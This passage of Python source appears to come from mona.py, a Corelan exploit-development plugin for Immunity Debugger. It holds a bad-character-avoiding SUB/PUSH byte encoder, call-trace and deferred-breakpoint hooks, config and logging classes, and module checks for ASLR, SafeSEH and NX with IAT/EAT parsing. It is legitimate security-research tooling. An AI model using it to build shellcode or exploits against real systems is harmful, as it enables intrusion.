val3=currval/3
sumval=val1+val2+val3
if sumval < currval:
val3 = val3 + (currval-sumval)
#validate / fix badchars
fixvals=self.validatebadchars_enc(val1,val2,val3,badchars)
val1="%02x" % fixvals[0]
val2="%02x" % fixvals[1]
val3="%02x" % fixvals[2]
opcodes.append(val1)
opcodes.append(val2)
opcodes.append(val3)
bcnt=bcnt-1
# we should now have 12 bytes in opcodes
if not silent:
dbg.log(" -----------")
dbg.log(" %s %s %s %s" % (opcodes[9],opcodes[6],opcodes[3],opcodes[0]))
dbg.log(" %s %s %s %s" % (opcodes[10],opcodes[7],opcodes[4],opcodes[1]))
dbg.log(" %s %s %s %s" % (opcodes[11],opcodes[8],opcodes[5],opcodes[2]))
dbg.log("")
thisencodedbyte = "\x2D"
thisencodedbyte += hex2bin("\\x%s" % opcodes[0])
thisencodedbyte += hex2bin("\\x%s" % opcodes[3])
thisencodedbyte += hex2bin("\\x%s" % opcodes[6])
thisencodedbyte += hex2bin("\\x%s" % opcodes[9])
encodedbytes[encodedline] = [thisencodedbyte,"SUB EAX,0x%s%s%s%s" % (opcodes[9],opcodes[6],opcodes[3],opcodes[0])]
encodedline += 1
thisencodedbyte = "\x2D"
thisencodedbyte += hex2bin("\\x%s" % opcodes[1])
thisencodedbyte += hex2bin("\\x%s" % opcodes[4])
thisencodedbyte += hex2bin("\\x%s" % opcodes[7])
thisencodedbyte += hex2bin("\\x%s" % opcodes[10])
encodedbytes[encodedline] = [thisencodedbyte,"SUB EAX,0x%s%s%s%s" % (opcodes[10],opcodes[7],opcodes[4],opcodes[1])]
encodedline += 1
thisencodedbyte = "\x2D"
thisencodedbyte += hex2bin("\\x%s" % opcodes[2])
thisencodedbyte += hex2bin("\\x%s" % opcodes[5])
thisencodedbyte += hex2bin("\\x%s" % opcodes[8])
thisencodedbyte += hex2bin("\\x%s" % opcodes[11])
encodedbytes[encodedline] = [thisencodedbyte,"SUB EAX,0x%s%s%s%s" % (opcodes[11],opcodes[8],opcodes[5],opcodes[2])]
encodedline += 1
encodedbytes[encodedline] = ["\x50","PUSH EAX"]
encodedline += 1
blockcnt -= 1
return encodedbytes
def validatebadchars_enc(self,val1,val2,val3,badchars):
newvals=[]
allok=0
giveup=0
type=0
origval1=val1
origval2=val2
origval3=val3
d1=0
d2=0
d3=0
lastd1=0
lastd2=0
lastd3=0
while allok==0 and giveup==0:
#check if there are bad chars left
charcnt=0
val1ok=1
val2ok=1
val3ok=1
while charcnt < len(badchars):
if (hex2bin("%02x" % val1) in badchars):
val1ok=0
if (hex2bin("%02x" % val2) in badchars):
val2ok=0
if (hex2bin("%02x" % val3) in badchars):
val3ok=0
charcnt=charcnt+1
if (val1ok==0) or (val2ok==0) or (val3ok==0):
allok=0
else:
allok=1
if allok==0:
#try first by sub 1 from val1 and val2, and add more to val3
if type==0:
val1=val1-1
val2=val2-1
val3=val3+2
if (val1<1) or (val2==0) or (val3 > 126):
val1=origval1
val2=origval2
val3=origval3
type=1
if type==1:
#then try by add 1 to val1 and val2, and sub more from val3
val1=val1+1
val2=val2+1
val3=val3-2
if (val1>126) or (val2>126) or (val3 < 1):
val1=origval1
val2=origval2
val3=origval3
type=2
if type==2:
#try by sub 2 from val1, and add 1 to val2 and val3
val1=val1-2
val2=val2+1
val3=val3+1
if (val1<1) or (val2>126) or (val3 > 126):
val1=origval1
val2=origval2
val3=origval3
type=3
if type==3:
#try by add 2 to val1, and sub 1 from val2 and val3
val1=val1+2
val2=val2-1
val3=val3-1
if (val1 > 126) or (val2 < 1) or (val3 < 1):
val1=origval1
val2=origval2
val3=origval3
type=4
if type==4:
if (val1ok==0):
val1=val1-1
d1=d1+1
else:
#now spread delta over other 2 values
if (d1 > 0):
val2=val2+1
val3=origval3+d1-1
d1=d1-1
else:
val1=0
if (val1 < 1) or (val2 > 126) or (val3 > 126):
val1=origval1
val2=origval2
val3=origval3
d1=0
type=5
if type==5:
if (val1ok==0):
val1=val1+1
d1=d1+1
else:
#now spread delta over other 2 values
if (d1 > 0):
val2=val2-1
val3=origval3-d1+1
d1=d1-1
else:
val1=255
if (val1>126) or (val2 < 1) or (val3 < 1):
val1=origval1
val2=origval2
val3=origval3
val1ok=0
val2ok=0
val3ok=0
d1=0
d2=0
d3=0
type=6
if type==6:
if (val1ok==0):
val1=val1-1
#d1=d1+1
if (val2ok==0):
val2=val2+1
#d2=d2+1
d3=origval1-val1+origval2-val2
val3=origval3+d3
if (lastd3==d3) and (d3 > 0):
val1=origval1
val2=origval2
val3=origval3
giveup=1
else:
lastd3=d3
if (val1<1) or (val2 < 1) or (val3 > 126):
val1=origval1
val2=origval2
val3=origval3
giveup=1
#check results
charcnt=0
val1ok=1
val2ok=1
val3ok=1
val1text="OK"
val2text="OK"
val3text="OK"
while charcnt < len(badchars):
if (val1 == badchars[charcnt]):
val1ok=0
val1text="NOK"
if (val2 == badchars[charcnt]):
val2ok=0
val2text="NOK"
if (val3 == badchars[charcnt]):
val3ok=0
val3text="NOK"
charcnt=charcnt+1
if (val1ok==0) or (val2ok==0) or (val3ok==0):
dbg.log(" ** Unable to fix bad char issue !",highlight=1)
dbg.log(" -> Values to check : %s(%s) %s(%s) %s(%s) " % (bin2hex(origval1),val1text,bin2hex(origval2),val2text,bin2hex(origval3),val3text),highlight=1)
val1=origval1
val2=origval2
val3=origval3
newvals.append(val1)
newvals.append(val2)
newvals.append(val3)
return newvals
#---------------------------------------#
# Class to perform call tracing #
#---------------------------------------#
class MnCallTraceHook(LogBpHook):
def __init__(self, callptr, showargs, instruction, logfile):
LogBpHook.__init__(self)
self.callptr = callptr
self.showargs = showargs
self.logfile = logfile
self.instruction = instruction
def run(self,regs):
# get instruction at this address
thisaddress = regs["EIP"]
thisinstruction = self.instruction
allargs = []
argstr = ""
if thisinstruction.startswith("CALL "):
if self.showargs > 0:
for cnt in xrange(self.showargs):
thisarg = 0
try:
thisarg = struct.unpack('<L',dbg.readMemory(regs["ESP"]+(cnt*4),4))[0]
except:
thisarg = 0
allargs.append(thisarg)
argstr += "0x%08x, " % thisarg
argstr = argstr.strip(" ")
argstr = argstr.strip(",")
#dbg.log("CallTrace : 0x%08x : %s (%s)" % (thisaddress,thisinstruction,argstr),address = thisaddress)
#else:
#dbg.log("CallTrace : 0x%08x : %s" % (thisaddress,thisinstruction), address = thisaddress)
# save to file
try:
FILE=open(self.logfile,"a")
textra = ""
for treg in dbglib.Registers32BitsOrder:
if thisinstruction.lower().find(treg.lower()) > -1:
textra += "%s = 0x%08x, " % (treg,regs[treg])
if textra != "":
textra = textra.strip(" ")
textra = textra.strip(",")
textra = "(" + textra + ")"
FILE.write("0x%08x : %s %s\n" % (thisaddress, thisinstruction, textra))
if self.showargs > 0:
cnt = 0
while cnt < len(allargs):
content = ""
try:
bytecontent = dbg.readMemory(allargs[cnt],16)
content = bin2hex(bytecontent)
except:
content = ""
FILE.write(" Arg%d at 0x%08x : 0x%08x : %s\n" % (cnt,regs["ESP"]+(cnt*4),allargs[cnt],content))
cnt += 1
FILE.close()
except:
#dbg.log("OOPS", highlight=1)
pass
if thisinstruction.startswith("RETN"):
returnto = 0
try:
returnto = struct.unpack('<L',dbg.readMemory(regs["ESP"],4))[0]
except:
returnto = 0
#dbg.log("ReturnTrace : 0x%08x : %s - Return To 0x%08x" % (thisaddress,thisinstruction,returnto), address = thisaddress)
try:
FILE=open(self.logfile,"a")
FILE.write("0x%08x : %s \n" % (thisaddress, thisinstruction))
FILE.write(" ReturnTo at 0x%08x : 0x%08x\n" % (regs["ESP"],returnto))
FILE.write(" EAX : 0x%08x\n" % regs["EAX"])
FILE.close()
except:
pass
#---------------------------------------#
# Class to set deferred BP Hooks #
#---------------------------------------#
class MnDeferredHook(LogBpHook):
def __init__(self, loadlibraryptr, targetptr):
LogBpHook.__init__(self)
self.targetptr = targetptr
self.loadlibraryptr = loadlibraryptr
def run(self,regs):
#dbg.log("0x%08x - DLL Loaded, checking for %s" % (self.loadlibraryptr,self.targetptr), highlight=1)
dbg.pause()
if self.targetptr.find(".") > -1:
# function name, try to resolve
functionaddress = dbg.getAddress(self.targetptr)
if functionaddress > 0:
dbg.log("Deferred Breakpoint set at %s (0x%08x)" % (self.targetptr,functionaddress),highlight=1)
dbg.setBreakpoint(functionaddress)
self.UnHook()
dbg.log("Hook removed")
dbg.run()
return
if self.targetptr.find("+") > -1:
ptrparts = self.targetptr.split("+")
modname = ptrparts[0]
if not modname.lower().endswith(".dll"):
modname += ".dll"
themodule = getModuleObj(modname)
if themodule != None and len(ptrparts) > 1:
address = themodule.getBase() + int(ptrparts[1],16)
if address > 0:
dbg.log("Deferred Breakpoint set at %s (0x%08x)" % (self.targetptr,address),highlight=1)
dbg.setBreakpoint(address)
self.UnHook()
dbg.log("Hook removed")
dbg.run()
return
if self.targetptr.find("+") == -1 and self.targetptr.find(".") == -1:
address = int(self.targetptr,16)
thispage = dbg.getMemoryPageByAddress(address)
if thispage != None:
dbg.setBreakpoint(address)
dbg.log("Deferred Breakpoint set at 0x%08x" % address, highlight=1)
self.UnHook()
dbg.log("Hook removed")
dbg.run()
#---------------------------------------#
# Class to access config file #
#---------------------------------------#
class MnConfig:
"""
Class to perform config file operations
"""
def __init__(self):
self.configfile = "mona.ini"
self.currpath = os.path.dirname(os.path.realpath(self.configfile))
# first check if we will be saving the file into Immunity folder
if __DEBUGGERAPP__ == "Immunity Debugger":
if not os.path.exists(os.path.join(self.currpath,"immunitydebugger.exe")):
dbg.log(" ** Warning: using mona.ini file from %s" % self.currpath)
def get(self,parameter):
"""
Retrieves the contents of a given parameter from the config file
or from memory if the config file has been read already
(configFileCache)
Arguments:
parameter - the name of the parameter
Return:
A string, containing the contents of that parameter
"""
#read config file
#format : parameter=value
toreturn = ""
curparam=[]
global configFileCache
#first check if parameter already exists in global cache
if parameter.strip().lower() in configFileCache:
toreturn = configFileCache[parameter.strip().lower()]
#dbg.log("Found parameter %s in cache: %s" % (parameter, toreturn))
else:
if os.path.exists(self.configfile):
try:
configfileobj = open(self.configfile,"rb")
content = configfileobj.readlines()
configfileobj.close()
for thisLine in content:
if not thisLine[0] == "#":
currparam = thisLine.split('=')
if currparam[0].strip().lower() == parameter.strip().lower() and len(currparam) > 1:
#get value
currvalue = ""
i=1
while i < len(currparam):
currvalue = currvalue + currparam[i] + "="
i += 1
toreturn = currvalue.rstrip("=").replace('\n','').replace('\r','')
# drop into global cache for next time
configFileCache[parameter.strip().lower()] = toreturn
#dbg.log("Read parameter %s from file: %s" % (parameter, toreturn))
except:
toreturn=""
return toreturn
def set(self,parameter,paramvalue):
"""
Sets/Overwrites the contents of a given parameter in the config file
Arguments:
parameter - the name of the parameter
paramvalue - the new value of the parameter
Return:
nothing
"""
global configFileCache
configFileCache[parameter.strip().lower()] = paramvalue
if os.path.exists(self.configfile):
#modify file
try:
configfileobj = open(self.configfile,"r")
content = configfileobj.readlines()
configfileobj.close()
newcontent = []
paramfound = False
for thisLine in content:
thisLine = thisLine.replace('\n','').replace('\r','')
if not thisLine[0] == "#":
currparam = thisLine.split('=')
if currparam[0].strip().lower() == parameter.strip().lower():
newcontent.append(parameter+"="+paramvalue+"\n")
paramfound = True
else:
newcontent.append(thisLine+"\n")
else:
newcontent.append(thisLine+"\n")
if not paramfound:
newcontent.append(parameter+"="+paramvalue+"\n")
#save new config file (rewrite)
dbg.log("[+] Saving config file, modified parameter %s" % parameter)
FILE=open(self.configfile,"w")
FILE.writelines(newcontent)
FILE.close()
dbg.log(" mona.ini saved under %s" % self.currpath)
except:
dbg.log("Error writing config file : %s : %s" % (sys.exc_type,sys.exc_value),highlight=1)
return ""
else:
#create new file
try:
dbg.log("[+] Creating config file, setting parameter %s" % parameter)
FILE=open(self.configfile,"w")
FILE.write("# -----------------------------------------------#\n")
FILE.write("# !mona.py configuration file #\n")
FILE.write("# Corelan Team - https://www.corelan.be #\n")
FILE.write("# -----------------------------------------------#\n")
FILE.write(parameter+"="+paramvalue+"\n")
FILE.close()
except:
dbg.log(" ** Error writing config file", highlight=1)
return ""
return ""
#---------------------------------------#
# Class to log entries to file #
#---------------------------------------#
class MnLog:
"""
Class to perform logfile operations
"""
def __init__(self, filename):
self.filename = filename
def reset(self,clear=True,showheader=True):
"""
Optionally clears the log file, writes a header to it and returns the filename
Optional :
clear = Boolean. When set to false, the logfile won't be cleared. This method can be
used to retrieve the full path to the logfile name of the current MnLog class object
Logfiles are written to the debugger program folder, unless a config value 'workingfolder' is set.
Return:
full path to the logfile name.
"""
global noheader
if clear:
if not silent:
dbg.log("[+] Preparing output file '" + self.filename +"'")
if not showheader:
noheader = True
debuggedname = dbg.getDebuggedName()
thispid = dbg.getDebuggedPid()
if thispid == 0:
debuggedname = "_no_name_"
thisconfig = MnConfig()
workingfolder = thisconfig.get("workingfolder").rstrip("\\").strip()
#strip extension from debuggedname
parts = debuggedname.split(".")
extlen = len(parts[len(parts)-1])+1
debuggedname = debuggedname[0:len(debuggedname)-extlen]
debuggedname = debuggedname.replace(" ","_")
workingfolder = workingfolder.replace('%p', debuggedname)
workingfolder = workingfolder.replace('%i', str(thispid))
logfile = workingfolder + "\\" + self.filename
#does working folder exist ?
if workingfolder != "":
if not os.path.exists(workingfolder):
try:
dbg.log(" - Creating working folder %s" % workingfolder)
#recursively create folders
os.makedirs(workingfolder)
dbg.log(" - Folder created")
except:
dbg.log(" ** Unable to create working folder %s, the debugger program folder will be used instead" % workingfolder,highlight=1)
logfile = self.filename
else:
logfile = self.filename
if clear:
if not silent:
dbg.log(" - (Re)setting logfile %s" % logfile)
try:
if os.path.exists(logfile):
try:
os.remove(logfile+".old")
except:
pass
try:
os.rename(logfile,logfile+".old")
except:
try:
os.rename(logfile,logfile+".old2")
except:
pass
except:
pass
#write header
if not noheader:
try:
with open(logfile,"w") as fh:
fh.write("=" * 80 + '\n')
thisversion,thisrevision = getVersionInfo(inspect.stack()[0][1])
thisversion = thisversion.replace("'","")
fh.write(" Output generated by mona.py v"+thisversion+", rev "+thisrevision+" - " + __DEBUGGERAPP__ + "\n")
fh.write(" Corelan Team - https://www.corelan.be\n")
fh.write("=" * 80 + '\n')
osver=dbg.getOsVersion()
osrel=dbg.getOsRelease()
fh.write(" OS : " + osver + ", release " + osrel + "\n")
fh.write(" Process being debugged : " + debuggedname +" (pid " + str(thispid) + ")\n")
currmonaargs = " ".join(x for x in currentArgs)
fh.write(" Current mona arguments: %s\n" % currmonaargs)
fh.write("=" * 80 + '\n')
fh.write(" " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + "\n")
fh.write("=" * 80 + '\n')
except:
pass
else:
try:
with open(logfile,"w") as fh:
fh.write("")
except:
pass
#write module table
try:
if not ignoremodules:
showModuleTable(logfile)
except:
pass
return logfile
def write(self,entry,logfile):
"""
Write an entry (can be multiline) to a given logfile
Arguments:
entry - the data to write to the logfile
logfile - the full path to the logfile
Return:
nothing
"""
towrite = ""
#check if entry is int
if type(entry) == int:
if entry > 0:
ptrx = MnPointer(entry)
modname = ptrx.belongsTo()
modinfo = MnModule(modname)
towrite = "0x" + toHex(entry) + " : " + ptrx.__str__() + " " + modinfo.__str__()
else:
towrite = entry
else:
towrite = entry
# if this fails, we got an unprintable character
try:
towrite = str(towrite)
except:
# one at a time
towrite2 = ""
for c in towrite:
try:
towrite2 += str(c)
except:
towrite2 += "\\x" + str(hex(ord(c))).replace("0x","")
towrite = towrite2
try:
with open(logfile,"a") as fh:
if towrite.find('\n') > -1:
fh.writelines(towrite)
else:
fh.write(towrite+"\n")
except:
pass
return True
#---------------------------------------#
# Simple Queue class #
#---------------------------------------#
class MnQueue:
"""
Simple queue class
"""
def __init__(self):
self.holder = []
def enqueue(self,val):
self.holder.append(val)
def dequeue(self):
val = None
try:
val = self.holder[0]
if len(self.holder) == 1:
self.holder = []
else:
self.holder = self.holder[1:]
except:
pass
return val
def IsEmpty(self):
result = False
if len(self.holder) == 0:
result = True
return result
#---------------------------------------#
# Class to access module properties #
#---------------------------------------#
class MnModule:
"""
Class to access module properties
"""
def __init__(self, modulename):
#dbg.log("MnModule(%s)" % modulename)
modisaslr = True
modissafeseh = True
modrebased = True
modisnx = True
modisos = True
self.IAT = {}
self.EAT = {}
path = ""
mzbase = 0
mzsize = 0
mztop = 0
mcodebase = 0
mcodesize = 0
mcodetop = 0
mentry = 0
mversion = ""
self.internalname = modulename
if modulename != "":
# if info is cached, retrieve from cache
if ModInfoCached(modulename):
modisaslr = getModuleProperty(modulename,"aslr")
modissafeseh = getModuleProperty(modulename,"safeseh")
modrebased = getModuleProperty(modulename,"rebase")
modisnx = getModuleProperty(modulename,"nx")
modisos = getModuleProperty(modulename,"os")
path = getModuleProperty(modulename,"path")
mzbase = getModuleProperty(modulename,"base")
mzsize = getModuleProperty(modulename,"size")
mztop = getModuleProperty(modulename,"top")
mversion = getModuleProperty(modulename,"version")
mentry = getModuleProperty(modulename,"entry")
mcodebase = getModuleProperty(modulename,"codebase")
mcodesize = getModuleProperty(modulename,"codesize")
mcodetop = getModuleProperty(modulename,"codetop")
else:
#gather info manually - this code should only get called from populateModuleInfo()
self.moduleobj = dbg.getModule(modulename)
modissafeseh = True
modisaslr = True
modisnx = True
modrebased = False
modisos = False
#if self.moduleobj == None:
# dbg.log("*** Error - self.moduleobj is None, key %s" % modulename, highlight=1)
mod = self.moduleobj
mzbase = mod.getBaseAddress()
mzrebase = mod.getFixupbase()
mzsize = mod.getSize()
mversion = mod.getVersion()
mentry = mod.getEntry()
mcodebase = mod.getCodebase()
mcodesize = mod.getCodesize()
mcodetop = mcodebase + mcodesize
mversion=mversion.replace(", ",".")
mversionfields=mversion.split('(')
mversion=mversionfields[0].replace(" ","")
if mversion=="":
mversion="-1.0-"
path=mod.getPath()
if mod.getIssystemdll() == 0:
modisos = "WINDOWS" in path.upper()
else:
modisos = True
mztop = mzbase + mzsize
if mzbase > 0:
peoffset=struct.unpack('<L',dbg.readMemory(mzbase+0x3c,4))[0]
pebase=mzbase+peoffset
osver=dbg.getOsVersion()
safeseh_offset = [0x5f, 0x5f, 0x5e]
safeseh_flag = [0x4, 0x4, 0x400]
os_index = 0
# Vista / Win7 / Win8
if win7mode:
os_index = 2
flags=struct.unpack('<H',dbg.readMemory(pebase+safeseh_offset[os_index],2))[0]
numberofentries=struct.unpack('<L',dbg.readMemory(pebase+0x74,4))[0]
#safeseh ?
if (flags&safeseh_flag[os_index])!=0:
modissafeseh=True
else:
if numberofentries>10:
sectionaddress,sectionsize=struct.unpack('<LL',dbg.readMemory(pebase+0x78+8*10,8))
sectionaddress+=mzbase
data=struct.unpack('<L',dbg.readMemory(sectionaddress,4))[0]
condition = False
if os_index < 2:
condition=(sectionsize!=0) and ((sectionsize==0x40) or (sectionsize==data))
else:
condition=(sectionsize!=0) and ((sectionsize==0x40))
if condition==False:
modissafeseh=False
else:
sehlistaddress,sehlistsize=struct.unpack('<LL',dbg.readMemory(sectionaddress+0x40,8))
if sehlistaddress!=0 and sehlistsize!=0:
modissafeseh=True
else:
modissafeseh=False
#aslr
if (flags&0x0040)==0: # 'IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE
modisaslr=False
#nx
if (flags&0x0100)==0:
modisnx=False
#rebase
if mzrebase != mzbase:
modrebased=True
else:
# should never be hit
#print "No module specified !!!"
#print "stacktrace : "
#print traceback.format_exc()
return None
#check if module is excluded
thisconfig = MnConfig()
allexcluded = []
excludedlist = thisconfig.get("excluded_modules")
modfound = False
if excludedlist:
allexcluded = excludedlist.split(',')
for exclentry in allexcluded:
if exclentry.lower().strip() == modulename.lower().strip():
modfound = True
self.isExcluded = modfound
#done - populate variables
self.isAslr = modisaslr
self.isSafeSEH = modissafeseh
self.isRebase = modrebased
self.isNX = modisnx
self.isOS = modisos
self.moduleKey = modulename
self.modulePath = path
self.moduleBase = mzbase
self.moduleSize = mzsize
self.moduleTop = mztop
self.moduleVersion = mversion
self.moduleEntry = mentry
self.moduleCodesize = mcodesize
self.moduleCodetop = mcodetop
self.moduleCodebase = mcodebase
def __str__(self):
#return general info about the module
#modulename + info
"""
Get information about a module (human readable format)
Arguments:
None
Return:
String with various properties about a module
"""
outstring = ""
if self.moduleKey != "":
outstring = "[" + self.moduleKey + "] ASLR: " + str(self.isAslr) + ", Rebase: " + str(self.isRebase) + ", SafeSEH: " + str(self.isSafeSEH) + ", OS: " + str(self.isOS) + ", v" + self.moduleVersion + " (" + self.modulePath + ")"
else:
outstring = "[None]"
return outstring
def isAslr(self):
return self.isAslr
def isSafeSEH(self):
return self.isSafeSEH
def isRebase(self):
return self.isRebase
def isOS(self):
return self.isOS
def isNX(self):
return self.isNX
def moduleKey(self):
return self.moduleKey
def modulePath(self):
return self.modulePath
def moduleBase(self):
return self.moduleBase
def moduleSize(self):
return self.moduleSize
def moduleTop(self):
return self.moduleTop
def moduleEntry(self):
return self.moduleEntry
def moduleCodebase(self):
return self.moduleCodebase
def moduleCodesize(self):
return self.moduleCodesize
def moduleCodetop(self):
return self.moduleCodetop
def moduleVersion(self):
return self.moduleVersion
def isExcluded(self):
return self.isExcluded
def getFunctionCalls(self,criteria={}):
funccalls = {}
sequences = []
sequences.append(["call","\xff\x15"])
funccalls = searchInRange(sequences, self.moduleBase, self.moduleTop,criteria)
return funccalls
def getIAT(self):
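"""
Reconstructs the Import Address Table of the module.
Uses the debugger's import symbols when available, then walks the IAT
directory found via the PE DataDirectory; as a last resort it derives
entries from the function calls made inside the module.
Return: dictionary, key = IAT slot address, value = imported function name
"""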
IAT = {}
try:
if len(self.IAT) == 0:
themod = dbg.getModule(self.moduleKey)
syms = themod.getSymbols()
thename = ""
for sym in syms:
if syms[sym].getType().startswith("Import"):
thename = syms[sym].getName()
theaddress = syms[sym].getAddress()
if not theaddress in IAT:
IAT[theaddress] = thename
# merge
# find optional header
PEHeader_ref = self.moduleBase + 0x3c
PEHeader_location = self.moduleBase + struct.unpack('<L',dbg.readMemory(PEHeader_ref,4))[0]
# do we have an optional header ?
bsizeOfOptionalHeader = dbg.readMemory(PEHeader_location+0x14,2)
sizeOfOptionalHeader = struct.unpack('<L',bsizeOfOptionalHeader+"\x00\x00")[0]
OptionalHeader_location = PEHeader_location + 0x18
if sizeOfOptionalHeader > 0:
# get address of DataDirectory
DataDirectory_location = OptionalHeader_location + 0x60
# get size of Import Table
importtable_size = struct.unpack('<L',dbg.readMemory(DataDirectory_location+0x64,4) )[0]
importtable_rva = struct.unpack('<L',dbg.readMemory(DataDirectory_location+0x60,4) )[0]
iatAddr = self.moduleBase + importtable_rva
max_nr_entries = importtable_size / 4
iatcnt = 0
while iatcnt < max_nr_entries:
thisloc = iatAddr + (4*iatcnt)
iatEntry = struct.unpack('<L',dbg.readMemory(thisloc,4) )[0]
if iatEntry > 0:
ptr = iatEntry
ptrx = MnPointer(iatEntry)
modname = ptrx.belongsTo()
tmod = MnModule(modname)
thisfunc = dbglib.Function(dbg,ptr)
thisfuncfullname = thisfunc.getName().lower()
if thisfuncfullname.endswith(".unknown") or thisfuncfullname.endswith(".%08x" % ptr):
if not tmod is None:
imagename = tmod.getShortName()
eatlist = tmod.getEAT()
if iatEntry in eatlist:
thisfuncfullname = "." + imagename + "!" + eatlist[iatEntry]
thisfuncname = thisfuncfullname.split('.')
IAT[thisloc] = thisfuncname[1].strip(">")
else:
IAT[thisloc] = imagename + "!0x%08x" % iatEntry
else:
IAT[thisloc] = thisfuncfullname.replace(".","!")
iatcnt += 1
if len(IAT) == 0:
#search method nr 2, not accurate, but will find *something*
funccalls = self.getFunctionCalls()
for functype in funccalls:
for fptr in funccalls[functype]:
ptr=struct.unpack('<L',dbg.readMemory(fptr+2,4))[0]
if ptr >= self.moduleBase and ptr <= self.moduleTop:
if not ptr in IAT:
thisfunc = dbglib.Function(dbg,ptr)
thisfuncfullname = thisfunc.getName().lower()
thisfuncname = []
if thisfuncfullname.endswith(".unknown") or thisfuncfullname.endswith(".%08x" % ptr):
iatptr = struct.unpack('<L',dbg.readMemory(ptr,4))[0]
# see if we can find the original function name using the EAT
tptr = MnPointer(ptr)
modname = tptr.belongsTo()
tmod = MnModule(modname)
ofullname = thisfuncfullname
if not tmod is None:
imagename = tmod.getShortName()
eatlist = tmod.getEAT()
if iatptr in eatlist:
thisfuncfullname = "." + imagename + "!" + eatlist[iatptr]
if thisfuncfullname == ofullname:
tparts = thisfuncfullname.split('.')
thisfuncfullname = tparts[0] + (".%08x" % iatptr)
thisfuncname = thisfuncfullname.split('.')
IAT[ptr] = thisfuncname[1].strip(">")
self.IAT = IAT
else:
IAT = self.IAT
except:
import traceback
dbg.logLines(traceback.format_exc())
return IAT
return IAT
def getEAT(self):
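"""
Reconstructs the Export Address Table by parsing the PE export directory
of the module.
Return: dictionary, key = exported function address, value = function name
"""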
eatlist = {}
if len(self.EAT) == 0:
try:
# parse the PE export directory ourselves instead of relying on the debugger's symbol enumeration
# find optional header
PEHeader_ref = self.moduleBase + 0x3c
PEHeader_location = self.moduleBase + struct.unpack('<L',dbg.readMemory(PEHeader_ref,4))[0]
# do we have an optional header ?
bsizeOfOptionalHeader = dbg.readMemory(PEHeader_location+0x14,2)
sizeOfOptionalHeader = struct.unpack('<L',bsizeOfOptionalHeader+"\x00\x00")[0]
OptionalHeader_location = PEHeader_location + 0x18
if sizeOfOptionalHeader > 0:
# get address of DataDirectory
DataDirectory_location = OptionalHeader_location + 0x60
# get size of Export Table
exporttable_size = struct.unpack('<L',dbg.readMemory(DataDirectory_location+4,4) )[0]
exporttable_rva = struct.unpack('<L',dbg.readMemory(DataDirectory_location,4) )[0]
if exporttable_size > 0:
# get start of export table
eatAddr = self.moduleBase + exporttable_rva
nr_of_names = struct.unpack('<L',dbg.readMemory(eatAddr + 0x18,4))[0]
rva_of_names = self.moduleBase + struct.unpack('<L',dbg.readMemory(eatAddr + 0x20,4))[0]
address_of_functions = self.moduleBase + struct.unpack('<L',dbg.readMemory(eatAddr + 0x1c,4))[0]
for i in range(0, nr_of_names):
eatName = dbg.readString(self.moduleBase + struct.unpack('<L',dbg.readMemory(rva_of_names + (4 * i),4))[0])
eatAddress = self.moduleBase + struct.unpack('<L',dbg.readMemory(address_of_functions + (4 * i),4))[0]
eatlist[eatAddress] = eatName
self.EAT = eatlist
except:
return eatlist
else:
eatlist = self.EAT
return eatlist
def getShortName(self):
return stripExtension(self.moduleKey)
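# Illustrative usage (module name is hypothetical):
# mod = MnModule("kernel32.dll")
# print mod # prints ASLR / Rebase / SafeSEH / OS info for the module
# eat = mod.getEAT() # dictionary : export address -> function name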
def getNtGlobalFlag():
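"""
Reads the NtGlobalFlag field from the PEB (offset 0x68) and caches it
in the global NtGlobalFlag variable
Return: Int - the NtGlobalFlag value (0 if it could not be read)
"""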
pebaddress = dbg.getPEBAddress()
global NtGlobalFlag
if NtGlobalFlag == -1:
try:
NtGlobalFlag = struct.unpack('<L',dbg.readMemory(pebaddress+0x068,4))[0]
except:
NtGlobalFlag = 0
return NtGlobalFlag
def getNtGlobalFlagDefinitions():
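"""
Returns a dictionary mapping each GFlags bit to [abbreviation, description]
"""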
definitions = {}
definitions[0x0] = ["","No GFlags enabled"]
definitions[0x00000001] = ["soe", "Stop On Execute"]
definitions[0x00000002] = ["sls", "Show Loader Snaps"]
definitions[0x00000004] = ["dic", "Debug Initial Command"]
definitions[0x00000008] = ["shg", "Stop On Hung GUI"]
definitions[0x00000010] = ["htc", "Enable Heap Tail Checking"]
definitions[0x00000020] = ["hfc", "Enable Heap Free Checking"]
definitions[0x00000040] = ["hpc", "Enable Heap Parameter Checking"]
definitions[0x00000080] = ["hvc", "Enable Heap Validation On Call"]
definitions[0x00000100] = ["vrf", "Enable Application Verifier"]
definitions[0x00000200] = [" ", "Enable Silent Process Exit Monitoring"]
if not win7mode:
definitions[0x00000400] = ["ptg", "Enable Pool Tagging"]
definitions[0x00000800] = ["htg", "Enable Heap Tagging"]
definitions[0x00001000] = ["ust", "Create User Mode Stack Trace"]
definitions[0x00002000] = ["kst", "Create Kernel Mode Stack Trace"]
definitions[0x00004000] = ["otl", "Maintain A List Of Objects For Each Type"]
definitions[0x00008000] = ["htd", "Enable Heap Tagging By DLL"]
definitions[0x00010000] = ["dse", "Disable Stack Extension"]
definitions[0x00020000] = ["d32", "Enable Debugging Of Win32 Subsystem"]
definitions[0x00040000] = ["ksl", "Enable Loading Of Kernel Debugger Symbols"]
definitions[0x00080000] = ["dps", "Disable Paging Of Kernel Stacks"]
definitions[0x00100000] = ["scb", "Enable System Critical Breaks"]
definitions[0x00200000] = ["dhc", "Disable Heap Coalesce On Free"]
definitions[0x00400000] = ["ece", "Enable Close Exception"]
definitions[0x00800000] = ["eel", "Enable Exception Logging"]
definitions[0x01000000] = ["eot", "Early Object Handle Type Tagging"]
definitions[0x02000000] = ["hpa", "Enable Page Heap"]
definitions[0x04000000] = ["dwl", "Debug WinLogon"]
definitions[0x08000000] = ["ddp", "Buffer DbgPrint Output"]
definitions[0x10000000] = ["cse", "Early Critical Section Event Creation"]
definitions[0x40000000] = ["bhd", "Disable Bad Handles Detection"]
definitions[0x80000000] = ["dpd", "Disable Protected DLL Verification"]
return definitions
def getNtGlobalFlagValues(flag):
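"""
Decomposes a combined NtGlobalFlag value into its individual flag bits
by greedily subtracting the known flag values, largest first
Return: list of Ints
"""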
allvalues = []
for defvalue in getNtGlobalFlagDefinitions():
if defvalue > 0:
allvalues.append(defvalue)
# sort list descending
allvalues.sort(reverse=True)
flagvalues = []
remaining = flag
for flagvalue in allvalues:
if flagvalue <= remaining:
remaining -= flagvalue
if remaining >= 0:
flagvalues.append(flagvalue)
return flagvalues
def getNtGlobalFlagNames(flag):
names = []
allvalues = getNtGlobalFlagDefinitions()
currentvalues = getNtGlobalFlagValues(flag)
for defvalue in currentvalues:
